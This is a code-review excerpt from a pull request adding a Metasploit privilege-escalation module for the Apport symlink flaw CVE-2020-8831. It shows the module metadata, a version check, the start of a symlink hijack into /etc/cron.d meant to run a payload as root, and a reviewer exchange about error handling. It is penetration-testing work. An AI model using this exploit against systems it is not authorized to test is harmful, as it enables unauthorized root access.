modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb

```diff
@@ -0,0 +1,160 @@
+          able to create files with global 0777 permissions. This module exploits this weaknes by creating a
+          symbolic link to /etc/cron.d/ in order to write a system crontab that will execute a payload with
+          elevated permissions.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'gardnerapp'
+        ],
+        'References' => [
+          [
+            'URL', 'https://nostarch.com/zero-day', # pg. 59
+            'URL', 'https://ubuntu.com/security/CVE-2020-8831',
+            'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8831'
+          ]
+        ],
+        'Platform' => ['linux'],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Targets' => [
+          [
+            'Linux_Binary',
+            {
+              'Arch' => [ARCH_AARCH64, ARCH_X64]
+            }
+          ],
+          [
+            'Linux_Command',
+            {
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2 April 2020',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options [
+      OptString.new('WRITABLE_DIR', [true, 'A directory we can write to.', '/tmp']),
+      OptString.new('PAYLOAD_FILENAME', [true, 'Name of payload', Rex::Text.rand_text_alpha(rand(8..12))]),
+      OptString.new('CRON_INTERVAL', [true, 'Specify how often the Cron should run. Default is every minute.', '* * * * *'])
+    ]
+  end
+
+  def check
+    # If you are testing the module apport needs to be reinstalled on boot every time with
+    # sudo dpkg -i apport_2.20.11-0ubuntu21_all.deb 
+    # sudo rm -rf /var/lock/apport/ /tmp/payload /etc/cron.d/lock && unlink /var/lock/apport -> must be run after each subsequent test!
+    return CheckCode::Safe('Platform is not Linux') unless session.platform == 'linux'
+
+    # Check apport version
+    if !command_exists?('apport-cli')
+      return CheckCode::Safe('apport-cli does not appear to be installed or in the $PATH')
+    end
+
+    apport = cmd_exec('apport-cli --version').to_s
+
+    return CheckCode::Detected('Unable to determine apport version') if apport.blank?
+
+    # todo determine if prior versions of apport are vulnerable
+    apport_version = Rex::Version.new(apport.split('-').first)
+
+    vulnerable_version = Rex::Version.new('2.20.11')
+
+    if apport_version == vulnerable_version
+      vprint_good("Apport appears to be vulnerable.")
+      return CheckCode::Appears
+    end 
+
+    CheckCode::Safe
+  end
+
+  # Crash Apport and hijack a symlink
+  # this will creat a rwx /etc/cron.d/lock owned by root
+  def hijack_apport
+    
+    print_status("Creating symlink...")
+    link = cmd_exec ('ln -s /etc/cron.d /var/lock/apport')
+    print_status(link)
```

Comment:
Based on the [bug description](https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1862348), this could fail if `/var/lock/apport` already exists. It may be worthwhile adding a check here to ensure the symlink can be created (or was created successfully).

Reply:
I'll add this check, it was a problem while I was testing the module as the first run would create `/var/lock/apport` and the following tests would fail.